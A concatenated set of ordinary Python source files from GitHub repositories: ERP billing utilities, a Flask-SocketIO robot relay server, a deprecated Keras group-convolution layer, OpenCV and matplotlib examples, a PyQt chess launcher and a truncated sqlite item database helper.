ed_index:\n gen_st = fee['st']\n gen_ed = ed\n else:\n gen_st = fee['st']\n gen_ed = fee['ed']\n\n minute = minute_distance(gen_st, gen_ed)\n money_minute = int(fee['fee'] / 60)\n money = int(minute * fee['fee'] / 60)\n\n bills.append({\n 'st': gen_st,\n 'ed': gen_ed,\n 'fee_id': fee_id,\n 'minute': minute,\n 'money_minute': money_minute,\n 'money': money\n })\n\n return bills\n\ndef gen_order_no():\n return when.now().strftime('%Y%m%d%H%M%S') + str(random.randint(0, 99)).zfill(2)\n\ndef gen_bill_no(prefix):\n return prefix + gen_order_no()\n\ndef get_pay_state(pay_type):\n pay_state = BILL_PAY_STATE['pay'] if pay_type == PAY_TYPE['current'] else BILL_PAY_STATE['unpay']\n return pay_state\n\ndef get_bill_pay_state(pay_md):\n '''支付方式如果是现金, 则是已支付'''\n if pay_md in (PAY_MD['cash'], PAY_MD['pos']):\n return BILL_PAY_STATE['pay']\n return BILL_PAY_STATE['unpay']\n\ndef get_today_start_end_time(st, ed):\n today = when.today()\n format_str = '%s %s'\n\n if st < ed:\n st_time_str = format_str % (today, st)\n ed_time_str = format_str % (today, ed)\n\n return st_time_str, ed_time_str\n\n tomorrow = when.tomorrow()\n st_time_str = format_str % (today, st)\n ed_time_str = format_str % (tomorrow, ed)\n\n return st_time_str, ed_time_str\n\ndef get_yesterday_start_end_time(st, ed):\n yesterday = when.yesterday()\n format_str = '%s %s'\n\n if st < ed:\n st_time_str = format_str % (yesterday, st)\n ed_time_str = format_str % (yesterday, ed)\n\n return st_time_str, ed_time_str\n\n today = when.today()\n st_time_str = format_str % (yesterday, st)\n ed_time_str = format_str % (today, ed)\n\n return st_time_str, ed_time_str\n\ndef get_7days_start_end_time(st, ed):\n today = when.today()\n seven_days_ago = when.past(days=7).date()\n format_str = '%s %s'\n\n if st < ed:\n st_time_str = format_str % (seven_days_ago, st)\n ed_time_str = format_str % (today, ed)\n\n return st_time_str, ed_time_str\n\n tomorrow = when.tomorrow()\n st_time_str = format_str % (seven_days_ago, st)\n ed_time_str = format_str % (tomorrow, ed)\n\n return st_time_str, ed_time_str\n\ndef get_30days_start_end_time(st, ed):\n today = when.today()\n thirty_days_ago = when.past(days=30).date()\n format_str = '%s %s'\n\n if st < ed:\n st_time_str = format_str % (thirty_days_ago, st)\n ed_time_str = format_str % (today, ed)\n\n return st_time_str, ed_time_str\n\n tomorrow = when.tomorrow()\n st_time_str = format_str % (thirty_days_ago, st)\n ed_time_str = format_str % (tomorrow, ed)\n\n return st_time_str, ed_time_str\n\ndef get_range_start_end_time(start_day, end_day, st, ed):\n format_str = '%s %s'\n start_day = start_day.date()\n\n if st < ed:\n st_time_str = format_str % (start_day, st)\n ed_time_str = format_str % (end_day.date(), ed)\n\n return st_time_str, ed_time_str\n\n end_day = end_day.replace(days=1)\n st_time_str = format_str % (start_day, st)\n ed_time_str = format_str % (end_day.date(), ed)\n\n return st_time_str, ed_time_str\n\ndef check_if_success_bill(pay_type, pay_md):\n return pay_type == PAY_TYPE['poster'] or pay_md in (PAY_MD['cash'], PAY_MD['pos'])\n\ndef export_xlsx(data, export_filename):\n '''\n data = [\n {'sheetname': 'sheet1', titles: ['title_1', 'title_2', 'title_3'], data: [[1,2,3], [2,3,4], [3,4,5]]},\n {'sheetname': 'sheet2', titles: ['title_1', 'title_1', 'title_1'], data: [[1,2,3], [2,3,4], [3,4,5]]}\n ]\n data是数组,如果长度大于1,则有多少个sheet\n '''\n assert isinstance(data, list)\n wb = openpyxl.Workbook()\n alignment = Alignment(wrap_text=True)\n ws_num = len(data)\n wss = []\n max_len = [] # 是数组的数组: [[], [], []], 
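# Editor's note: illustrative stand-in for gen_order_no above, a time-sortable
# order number built from a second-resolution timestamp plus two zero-padded
# random digits (this reduces, but does not eliminate, same-second collisions).
import random
from datetime import datetime

def gen_order_no():
    return datetime.now().strftime('%Y%m%d%H%M%S') + str(random.randint(0, 99)).zfill(2)

print(gen_order_no())   # e.g. '2018101209301442'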
记录每一个sheet, 每一列的最大长度, 导出时, 显示更正常\n for i in range(ws_num):\n if i == 0:\n ws = wb.active # 第一个sheet是这么取的, 如果直接create_sheet, 生成的第一个sheet是空的\n ws.title = data[i].get('sheetname', '')\n else:\n ws = wb.create_sheet(data[i].get('sheetname', ''))\n for idx, title in enumerate(data[i].get('titles', [])):\n col = ord('A') + idx\n ws['%s1' % chr(col)] = title # 写入标题\n # 初始化每一个sheet的每一列最大宽度为这个列名(汉字)的长度\n max_len.append([len(bytes(str(title), 'GBK')) for title in data[i].get('titles', [])])\n wss.append(ws)\n for idx, ws in enumerate(wss):\n data_lines = data[idx].get('data', [])\n for line, data_line in enumerate(data_lines):\n for col, data_col in enumerate(data_line):\n cur_col = ord('A') + col\n data_col = str(data_col)\n ws['%s%s' % (chr(cur_col), line+2)] = data_col\n ws['%s%s' % (chr(cur_col), line+2)].alignment = alignment\n if len(bytes(data_col, 'GBK')) > max_len[idx][col]:\n max_len[idx][col] = len(bytes(data_col, 'GBK'))\n for colidx in range(len(data[idx].get('titles', []))):\n cur_col = ord('A') + colidx\n ws.column_dimensions['%s' % chr(cur_col)].width = max_len[idx][colidx]\n wb.save('%s' % export_filename)\n\ndef is_success_pay(tp, res):\n\n if int(res['errcode']) != 200:\n return False\n\n if ((tp=='ali' and\n (res.get('trade_status') == 'TRADE_SUCCESS') or\n int(res.get('code', 0))==10000) or\n (tp == 'wx' and\n res.get('return_code') == 'SUCCESS' and\n res.get('result_code') == 'SUCCESS' and\n res.get('trade_state') == 'SUCCESS')):\n return True\n\n return False\n","repo_name":"y00273676/O2O_ERP_Server","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35210879751","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO\nfrom flask_socketio import send, emit\nimport json\n\n\nLOG_LEVEL = 0 # 0=debug, 1=info, 3=warn, 4=error\nPRINT_LOG_WEBSOCKET = False # True will print log lines over websocket connection\nHOST = \"x.x.x.x\"\nPORT = 5000\n\n\napp = Flask(__name__)\nsocketio = SocketIO(app, logger=False)\n\n@app.route('/')\ndef root():\n return app.send_static_file('index.html')\n\n@socketio.on('robot')\ndef handle_robot_message(message):\n try:\n jsonMsg = json.loads(message)\n except:\n log(2,\"Could not parse JSON: {0}\".format(message))\n return\n\n # Parse and handle know message types\n if 'LOG' in jsonMsg and PRINT_LOG_WEBSOCKET:\n log(0, \"Robot LOG ({0}): {1}\".format(jsonMsg['LOG']['weight'], jsonMsg['LOG']['message']))\n if 'ECHO' in jsonMsg:\n # 'ECHO' is an API test. Do we have a connection?\n send_to_webclient({'received_over_channel':\"robot\",'original_msg':jsonMsg['ECHO']})\n #TODO handle more message types\n\n\n@socketio.on('webcl')\ndef handle_webclient_message(message):\n try:\n jsonMsg = json.loads(message)\n except:\n log(2,\"Could not parse JSON: {0}\".format(message))\n return\n\n # Parse and handle know message types\n if 'ROBOT' in jsonMsg:\n # 'ROBOT' is a type of message containing \n # information to be directly relayed to bot\n send_to_robot(jsonMsg['ROBOT'])\n if 'ECHO' in jsonMsg:\n # 'ECHO' is an API test. 
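# Editor's note on is_success_pay above: `and` binds tighter than `or`, so the
# Alipay code==10000 test escapes the tp=='ali' guard and can mark other
# providers successful. A hedged regrouping using the same fields (function
# name is hypothetical):
def is_success_pay_fixed(tp, res):
    if int(res['errcode']) != 200:
        return False
    if tp == 'ali':
        return (res.get('trade_status') == 'TRADE_SUCCESS'
                or int(res.get('code', 0)) == 10000)
    if tp == 'wx':
        return (res.get('return_code') == 'SUCCESS'
                and res.get('result_code') == 'SUCCESS'
                and res.get('trade_state') == 'SUCCESS')
    return False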
Do we have a connection?\n send_to_webclient({'received_over_channel':\"webcl\",'original_msg':jsonMsg['ECHO']})\n\n\n\ndef send_to_robot(message):\n \"\"\" Sends given message to connected robot\n Encodes message to JSON string\n Does not check for command validity\n \"\"\"\n try:\n msgStr = json.dumps(message)\n except:\n log(2,\"Could not convert message to JSON string: {0}\".format(message))\n return\n\n try:\n log(0,\"Msg to Robot: {0}\".format(msgStr))\n emit('robot', msgStr, broadcast=True)\n except:\n log(2,\"Could not communicate to robot: {0}\".format(msgStr))\n\n\ndef send_to_webclient(message):\n \"\"\" Sends given message to connected web client\n Encodes message to JSON string\n Does not check for command validity\n \"\"\"\n try:\n msgStr = json.dumps(message)\n except:\n log(2,\"Could not convert message to JSON string: {0}\".format(message))\n return\n\n try:\n log(0,\"Msg to WebCl: {0}\".format(msgStr))\n emit('webcl', msgStr, broadcast=True)\n except:\n log(2,\"Could not communicate to web client: {0}\".format(msgStr))\n\n\ndef log(level, msg):\n \"\"\" Print to sysout depending on given log level\n \n Logs when level>=LOG_LEVEL\n\n 0=debug\n 1=info\n 2=warn\n 3=error\n \"\"\"\n weight = \"?\"\n if level>=LOG_LEVEL:\n if level == 0:\n weight = \"DEBUG\"\n elif level == 1:\n weight = \"INFO\"\n elif level == 2:\n weight = \"WARN\"\n elif level == 3:\n weight = \"ERROR\"\n else:\n log(3, \"Invalid log level: {0}\".format(level))\n print(\"{0}: {1}\".format(weight, msg))\n\n\nif __name__ == '__main__':\n socketio.debug = True\n socketio.run(app, host=HOST, port=PORT)","repo_name":"HyHend/ArPiBot","sub_path":"arduino_rpi_server/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29442139622","text":"'''\n################################################################\n# Layers - Modern convolutional layers (deprecated)\n# @ Modern Deep Network Toolkits for Tensorflow-Keras\n# Yuchen Jin @ cainmagi@gmail.com\n# Requirements: (Pay attention to version)\n# python 3.6+\n# tensorflow r1.13+\n# We store the failed versions of APIs for .conv here.\n# Version: 0.10 # 2019/6/7\n# Comments:\n# A failed try for quick group convolution (QGroupConv), move\n# it to deprecated.\n################################################################\n'''\n\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.keras import activations\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras import constraints\nfrom tensorflow.python.keras import initializers\nfrom tensorflow.python.keras import regularizers\nfrom tensorflow.python.keras.utils import conv_utils\nfrom tensorflow.python.keras.engine.base_layer import Layer\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import nn\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import nn_impl\nfrom tensorflow.python.ops import math_ops\n\nfrom tensorflow.keras.layers import BatchNormalization, LeakyReLU, PReLU\nfrom tensorflow.python.keras.layers.convolutional import Conv, Conv2DTranspose, Conv3DTranspose, UpSampling1D, UpSampling2D, UpSampling3D, ZeroPadding1D, ZeroPadding2D, ZeroPadding3D, Cropping1D, Cropping2D, Cropping3D\nfrom .normalize import InstanceNormalization, GroupNormalization\n\nfrom .. 
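# Editor's note: minimal table-driven restatement of the numeric log levels
# used by log() in server.py above (0=debug .. 3=error); a dict lookup
# replaces the if/elif chain while keeping the same threshold check.
LOG_LEVEL = 0
WEIGHTS = {0: 'DEBUG', 1: 'INFO', 2: 'WARN', 3: 'ERROR'}

def log(level, msg):
    if level >= LOG_LEVEL:
        print('{0}: {1}'.format(WEIGHTS.get(level, '?'), msg))

log(2, 'Could not communicate to robot')   # -> WARN: Could not communicate to robot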
import compat\nif compat.COMPATIBLE_MODE['1.12']:\n from tensorflow.python.keras.engine.base_layer import InputSpec\nelse:\n from tensorflow.python.keras.engine.input_spec import InputSpec\n\nNEW_CONV_TRANSPOSE = True\nUSE_QUICK_GCONV = False\n\ndef _get_macro_conv(key='NEW_CONV_TRANSPOSE'):\n if key == 'USE_QUICK_GCONV':\n return USE_QUICK_GCONV\n else:\n return NEW_CONV_TRANSPOSE\n\nclass _QGroupConv(_GroupConv):\n \"\"\"Quick computing version for abstract nD group convolution layer.\n This is the quick computing version of the convolution.\n The work flow of `GroupConv` could be viewed as\n output = concat (i=1~G) ( convND(input[group_i]) )\n which means if we have G groups, we need to compute the `convND` op for G times.\n The original implementation calls operator `convND` for many times, which is\n inefficient. To solve this problem, we use such a work flow:\n output = sum (i=1~G) ( depth_convND(input)[group_i] )\n The difference is, we only need to call `depth_convND` (tf.nn.depthwise_conv2d) \n once. Furthermore, if we apply tf.reshape and tf.sum, we could also calculate \n the sum operator once. This is why we could use the above method to improve the\n efficiency.\n However, since there is only tf.nn.depthwise_conv2d in tensorflow, we could not\n use it to calculate GroupConv3D. But we could still calculate GroupConv1D by\n reducing the 2D convolution to 1D case.\n To learn more about group convolution, see the docstring for `GroupConv`.\n Arguments:\n rank: An integer, the rank of the convolution, e.g. \"2\" for 2D convolution.\n (rank > 2 is not allowed.)\n lgroups: Integer, the group number of the latent convolution branch. The\n number of filters in the whole latent space is lgroups * lfilters.\n lfilters: Integer, the dimensionality in each the lattent group (i.e. the\n number of filters in each latent convolution branch).\n kernel_size: An integer or tuple/list of n integers, specifying the\n length of the convolution window.\n strides: An integer or tuple/list of n integers,\n specifying the stride length of the convolution.\n Specifying any stride value != 1 is incompatible with specifying\n any `dilation_rate` value != 1.\n padding: One of `\"valid\"` or `\"same\"` (case-insensitive).\n data_format: A string, one of `channels_last` (default) or `channels_first`.\n The ordering of the dimensions in the inputs.\n `channels_last` corresponds to inputs with shape\n `(batch, ..., channels)` while `channels_first` corresponds to\n inputs with shape `(batch, channels, ...)`.\n dilation_rate: An integer or tuple/list of n integers, specifying\n the dilation rate to use for dilated convolution.\n Currently, specifying any `dilation_rate` value != 1 is\n incompatible with specifying any `strides` value != 1.\n activation: Activation function. Set it to None to maintain a\n linear activation.\n use_bias: Boolean, whether the layer uses a bias.\n kernel_initializer: An initializer for the convolution kernel.\n bias_initializer: An initializer for the bias vector. If None, the default\n initializer will be used.\n kernel_regularizer: Optional regularizer for the convolution kernel.\n bias_regularizer: Optional regularizer for the bias vector.\n activity_regularizer: Optional regularizer function for the output.\n kernel_constraint: Optional projection function to be applied to the\n kernel after being updated by an `Optimizer` (e.g. used to implement\n norm constraints or value constraints for layer weights). 
The function\n must take as input the unprojected variable and must return the\n projected variable (which must have the same shape). Constraints are\n not safe to use when doing asynchronous distributed training.\n bias_constraint: Optional projection function to be applied to the\n bias after being updated by an `Optimizer`.\n trainable: Boolean, if `True` also add variables to the graph collection\n `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n name: A string, the name of the layer.\n \"\"\"\n\n def __init__(self, rank,\n lgroups,\n lfilters,\n kernel_size,\n strides=1,\n padding='valid',\n data_format=None,\n dilation_rate=1,\n activation=None,\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n trainable=True,\n name=None,\n **kwargs):\n super(_GroupConv, self).__init__(\n trainable=trainable,\n name=name,\n activity_regularizer=regularizers.get(activity_regularizer),\n **kwargs)\n self.rank = rank\n if rank > 2:\n raise ValueError('The quick group convolution does not support 3D or any higher dimension.')\n initRank = rank\n self.lgroups = lgroups\n self.lfilters = lfilters\n self.kernel_size = conv_utils.normalize_tuple(\n kernel_size, rank, 'kernel_size')\n self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')\n self.padding = conv_utils.normalize_padding(padding)\n if (self.padding == 'causal' and not isinstance(self, (Conv1D, SeparableConv1D))):\n raise ValueError('Causal padding is only supported for `Conv1D` and ``SeparableConv1D`.')\n self.data_format = conv_utils.normalize_data_format(data_format)\n self.dilation_rate = conv_utils.normalize_tuple(\n dilation_rate, rank, 'dilation_rate')\n if rank == 1: # when rank=1, expand the tuples to 2D case.\n self.kernel_size = (1, *self.kernel_size)\n self.strides = (1, *self.strides)\n self.dilation_rate = (1, *self.dilation_rate)\n self.activation = activations.get(activation)\n self.use_bias = use_bias\n self.kernel_initializer = initializers.get(kernel_initializer)\n self.bias_initializer = initializers.get(bias_initializer)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n self.bias_regularizer = regularizers.get(bias_regularizer)\n self.kernel_constraint = constraints.get(kernel_constraint)\n self.bias_constraint = constraints.get(bias_constraint)\n self.input_spec = InputSpec(ndim=self.rank + 2)\n\n self.group_input_dim = None\n self.exp_dim_pos = None\n\n def build(self, input_shape):\n input_shape = tensor_shape.TensorShape(input_shape)\n if self.data_format == 'channels_first':\n channel_axis = 1\n self._data_format = 'NCHW'\n if self.rank == 1:\n self.exp_dim_pos = 2\n else:\n channel_axis = -1\n if self.rank == 1:\n self.exp_dim_pos = 1\n self._data_format = 'NHWC'\n if input_shape.dims[channel_axis].value is None:\n raise ValueError('The channel dimension of the inputs should be defined. 
Found `None`.')\n input_dim = int(input_shape[channel_axis])\n if input_dim % self.lgroups != 0:\n raise ValueError('To grouplize the input channels, the input channel number should be a multiple of group number (N*{0}), but given {1}'.format(self.lgroups, input_dim))\n self.group_input_dim = input_dim // self.lgroups\n self._strides = (1, *self.strides, 1)\n kernel_shape = self.kernel_size + (input_dim, self.lfilters)\n\n self.kernel = self.add_weight(\n name='kernel',\n shape=kernel_shape,\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint,\n trainable=True,\n dtype=self.dtype)\n if self.use_bias:\n self.bias = self.add_weight(\n name='bias',\n shape=(self.lfilters * self.lgroups,),\n initializer=self.bias_initializer,\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint,\n trainable=True,\n dtype=self.dtype)\n else:\n self.bias = None\n self.input_spec = InputSpec(ndim=self.rank + 2, axes={channel_axis: input_dim})\n if self.padding == 'causal':\n self.op_padding = 'valid'\n else:\n self.op_padding = self.padding\n self.built = True\n\n def call(self, inputs):\n if self.rank == 1:\n inputs = array_ops.expand_dims(inputs, axis=self.exp_dim_pos)\n outputs= nn_impl.depthwise_conv2d(input=inputs,\n filter=self.kernel,\n strides=self._strides,\n padding=self.op_padding.upper(),\n rate=self.dilation_rate,\n data_format=self._data_format)\n # Grouplize the output channels.\n r2_outputs_shape = outputs.get_shape().as_list()\n if self.data_format == 'channels_first':\n #get_oshape = r2_outputs_shape[:1].concatenate([self.lgroups*self.lfilters, self.group_input_dim]).concatenate(r2_outputs_shape[2:])\n get_oshape = [-1, self.lgroups*self.lfilters, self.group_input_dim, *r2_outputs_shape[2:]]\n outputs = array_ops.reshape(outputs, get_oshape)\n outputs = math_ops.reduce_sum(outputs, axis=1, keepdims=False)\n else:\n #get_oshape = r2_outputs_shape[:-1].concatenate([self.lgroups*self.lfilters, self.group_input_dim])\n get_oshape = [-1, *r2_outputs_shape[1:-1], self.lgroups*self.lfilters, self.group_input_dim]\n outputs = array_ops.reshape(outputs, get_oshape)\n outputs = math_ops.reduce_sum(outputs, axis=-1, keepdims=False)\n if self.rank == 1:\n outputs = array_ops.squeeze(outputs, axis=self.exp_dim_pos)\n outputs_list = []\n\n if self.use_bias:\n if self.data_format == 'channels_first':\n if self.rank == 1:\n # nn.bias_add does not accept a 1D input tensor.\n bias = array_ops.reshape(self.bias, (1, self.lfilters * self.lgroups, 1))\n outputs += bias\n if self.rank == 2:\n outputs = nn.bias_add(outputs, self.bias, data_format='NCHW')\n else:\n outputs = nn.bias_add(outputs, self.bias, data_format='NHWC')\n\n if self.activation is not None:\n return self.activation(outputs)\n return outputs","repo_name":"cainmagi/MDNT","sub_path":"layers/deprecated/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":12722,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"41851978649","text":"import cv2 as cv\nimport numpy as np\n\n\n## Function to draw a rectangule on mouse event\ndef click_event(event, x, y, flags, params):\n if event == cv.EVENT_LBUTTONDOWN:\n rectangule['x1'] = x\n rectangule['y1'] = y\n \n if event == cv.EVENT_LBUTTONUP:\n cv.rectangle(img, (rectangule['x1'], rectangule['y1']), (x, y), (255, 255, 255))\n cv.imshow('img', img)\n\n## Initial image and retangule position\nimg = np.zeros((600, 600, 3), np.uint8)\nrectangule = { 'x1': 0, 'y1': 
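# Editor's note: hedged numpy illustration of the reshape-and-sum bookkeeping
# that _QGroupConv.call performs above. A depthwise conv yields
# input_dim * lfilters maps, with input_dim = lgroups * group_input_dim;
# viewing them as (lgroups * lfilters, group_input_dim) and summing the last
# axis leaves one map per latent filter. Shapes only; the actual channel
# ordering is one reason the layer sits under `deprecated`.
import numpy as np

batch, h, w = 2, 8, 8
lgroups, lfilters, group_input_dim = 3, 4, 2
input_dim = lgroups * group_input_dim
depthwise_out = np.random.rand(batch, h, w, input_dim * lfilters)   # channels_last
grouped = depthwise_out.reshape(batch, h, w, lgroups * lfilters, group_input_dim)
print(grouped.sum(axis=-1).shape)   # (2, 8, 8, 12)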
0, 'x2': 0, 'y2': 0 }\n\n## Open window and wait to draw retangule\ncv.imshow('img', img)\ncv.setMouseCallback('img', click_event)\n\n## Waiting any button press to exit\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"natansilva/opencv_examples","sub_path":"02_mouse_event.py","file_name":"02_mouse_event.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27439297587","text":"## \n## highs_lows.py\n## @ianpasm(kno30826@gmail.com)\n## 2018-03-22 11:05:43\n## \n \n#!/usr/bin/env python3\n# coding=utf-8\n\nimport csv\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime\n\n#fetch date and the highest temperature from file\n#filename = 'sitka_weather_2014.csv'\nfilename = 'death_valley_2014.csv'\nwith open(filename) as f:\n reader = csv.reader(f)\n header_row = next(reader)\n\n dates,highs,lows = [],[],[]\n for row in reader:\n try:\n current_date = datetime.strptime(row[0],\"%Y-%m-%d\")\n high = int(row[1])\n low = int(row[3])\n except ValueError:\n print(current_date,'missing data')\n else: \n dates.append(current_date)\n highs.append(high)\n lows.append(low)\n #print(highs)\n\n #for index,column_header in enumerate(header_row):\n # print(index,column_header)\n\n# drawing graphic based on data\nfig = plt.figure(dpi=128,figsize=(10,6))\nplt.plot(dates,highs,c='red',alpha=0.5)\nplt.plot(dates,lows,c='blue',alpha=0.5)\nplt.fill_between(dates,highs,lows,facecolor='blue',alpha=0.1)\n\n#set style\ntitle = \"Daily high and low tempertures - 2014\\nDeath Valley,CA\"\nplt.title(title,fontsize=20)\nplt.xlabel('',fontsize=16)\nfig.autofmt_xdate()\nplt.ylabel(\"Temperture (F)\",fontsize=16)\nplt.tick_params(axis='both',which='major',labelsize=16)\n\nplt.show()\n\n\n\n\n","repo_name":"i0Ek3/PythonCrashCourse","sub_path":"code/part2/proj2/data_visualization/highs_lows.py","file_name":"highs_lows.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38123837555","text":"import sys, yaml\n\nfrom PyQt5 import *\nfrom PyQt5.QtWidgets import QApplication\n\nfrom .QtCChessMain import *\n\n#-----------------------------------------------------#\nclass QChessApp(QApplication):\n def __init__(self):\n super().__init__([])\n \n self.config = None\n \n self.mainWin = MainWindow(self)\n self.mainWin.show()\n \n def loadConfig(self):\n with open(APP_CONFIG_FILE) as f:\n try:\n self.config = yaml.load(f, Loader=yaml.FullLoader)\n except Exception as e:\n QMessageBox.warning(self, APP_NAME,\n APP_CONFIG_FILE + \" 配置文件错误:\" + str(e))\n self.config = None\n return\n \n \n\n#-----------------------------------------------------#\ndef run():\n app = QChessApp()\n sys.exit(app.exec_())\n ","repo_name":"walker8088/ChessQ","sub_path":"qtcchess/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"40"} +{"seq_id":"74571818999","text":"import sys\nimport os\n\nimport sqlite3\n\nconn = None\nc = None\n\ndef init_db():\n global conn\n global c\n\n # create data directory\n data_dir = \"./data\"\n if not os.path.isdir(data_dir):\n os.makedirs(data_dir)\n if not os.path.isdir(data_dir):\n print(\"Failed to create data path '{}'\".format(data_dir))\n return\n\n # open db\n #print(\"#### Opening database '{}'\".format(\"./data/data.db\"))\n conn = sqlite3.connect(\"./data/data.db\")\n\n # get cursor\n c = 
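# Editor's note: self-contained restatement of the missing-data guard in
# highs_lows.py above; each row is parsed inside try/except so a blank field
# skips that row instead of aborting the whole series. StringIO stands in for
# the CSV file, and row[0] is printed rather than the possibly stale
# current_date the sample reuses.
import csv
from datetime import datetime
from io import StringIO

f = StringIO('2014-07-01,64,,46\n2014-07-02,,,\n2014-07-03,70,,48\n')
dates, highs, lows = [], [], []
for row in csv.reader(f):
    try:
        current_date = datetime.strptime(row[0], '%Y-%m-%d')
        high, low = int(row[1]), int(row[3])
    except ValueError:
        print(row[0], 'missing data')
    else:
        dates.append(current_date)
        highs.append(high)
        lows.append(low)
print(len(dates), 'usable days')   # 2 usable days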
conn.cursor()\n\n # create table items\n c.execute('''\n SELECT name FROM sqlite_master\n WHERE type='table' AND name='items'\n ''')\n if c.fetchone() == None:\n #print(\"#### Creating table '{}' in database\".format('items'))\n c.execute('''\n CREATE TABLE items (\n name TEXT PRIMARY KEY NOT NULL,\n bunch INTEGER NOT NULL,\n descript TEXT NOT NULL)\n ''')\n\n # create table depends\n c.execute('''\n SELECT name FROM sqlite_master\n WHERE type='table' AND name='depends'\n ''')\n if c.fetchone() == None:\n #print(\"#### Creating table '{}' in database\".format('depends'))\n c.execute('''\n CREATE TABLE depends (\n name TEXT NOT NULL,\n depend_name TEXT NOT NULL,\n depend_bunch INTEGER NOT NULL)\n ''')\n\ndef assert_item_exists(name):\n global conn\n global c\n\n c.execute('''\n SELECT name FROM items \n WHERE name='{}'\n '''.format(name))\n if c.fetchone() == None:\n print(\"Item '{}' does not exist in database\".format(name))\n exit(-1)\n\ndef assert_item_not_exist(name):\n global conn\n global c\n\n c.execute('''\n SELECT name FROM items \n WHERE name='{}'\n '''.format(name))\n if c.fetchone() != None:\n print(\"Item '{}' already exists in database\".format(name))\n exit(-1)\n\n# remove existing depends of item if --force is specified in options\ndef remove_existing_item(name):\n global conn\n global c\n\n print(\"#### Remove item '{}' from table items in database\".format(name))\n # remove item\n c.execute('''\n DELETE FROM items\n WHERE name='{}'\n '''.format(name))\n\n print(\"#### Remove item '{}' from table depends in database\".format(name))\n # remove depends of item\n c.execute('''\n DELETE FROM depends\n WHERE name='{}'\n '''.format(name))\n\ndef add_item(args):\n global conn\n global c\n\n # add item\n print(\"#### Adding item '{}' to table items in database\".format(args['name']))\n c.execute('''\n INSERT INTO items\n (name, bunch, descript)\n VALUES('{}', '{}', '{}')\n '''.format(args['name'], args['bunch'], args['descript']))\n\n # add item depends\n for x in args['depend']:\n print(\"#### Add depend '{}' <- '{}' to table depends in database\".format(args['name'], x[0]))\n c.execute('''\n INSERT INTO depends\n (name, depend_name, depend_bunch)\n VALUES('{}', '{}', '{}')\n '''.format(args['name'], x[0], x[1]))\n\ndef close_db():\n global conn\n global c\n\n # commit connection changes\n conn.commit()\n\n # close cursor and db\n #print(\"#### Closing database\")\n c.close()\n conn.close()\n\ndef list_items():\n global conn\n global c\n\n c.execute(\"SELECT name FROM items\")\n\n items = list()\n row = c.fetchone()\n while row != None:\n items.append(row[0])\n row = c.fetchone()\n return items\n\ndef filter_items(pattern):\n global conn\n global c\n\n c.execute('''\n SELECT name FROM items\n WHERE name LIKE '%{}%' OR descript LIKE '%{}%'\n '''.format(pattern, pattern))\n\n names = list()\n row = c.fetchone()\n while row != None:\n names.append(row[0])\n row = c.fetchone()\n return names\n\ndef list_depends():\n global conn\n global c\n\n c.execute(\"SELECT name, depend_name FROM depends\")\n\n depends = list()\n row = c.fetchone()\n while row != None:\n depends.append((row[0], row[1]))\n row = c.fetchone()\n return depends\n\ndef get_item(name):\n global conn\n global c\n\n item = dict()\n depends = list()\n items = list()\n\n c.execute('''\n SELECT bunch, descript FROM items\n WHERE name='{}'\n '''.format(name))\n row = c.fetchone()\n assert row != None and c.fetchone() == None\n item['name'] = name\n item['bunch'] = row[0]\n item['descript'] = row[1]\n\n c.execute('''\n SELECT 
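# Editor's note: the queries in common.py above splice names in with
# str.format, which breaks on quotes and is injectable. A hedged equivalent
# using sqlite3 placeholders, runnable against an in-memory database:
import sqlite3

conn = sqlite3.connect(':memory:')
c = conn.cursor()
c.execute('CREATE TABLE items (name TEXT PRIMARY KEY NOT NULL, '
          'bunch INTEGER NOT NULL, descript TEXT NOT NULL)')
c.execute('INSERT INTO items (name, bunch, descript) VALUES (?, ?, ?)',
          ("philosopher's stone", 1, 'survives the embedded quote'))
c.execute('SELECT name FROM items WHERE name=?', ("philosopher's stone",))
print(c.fetchone())   # ("philosopher's stone",)
conn.commit()
conn.close()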
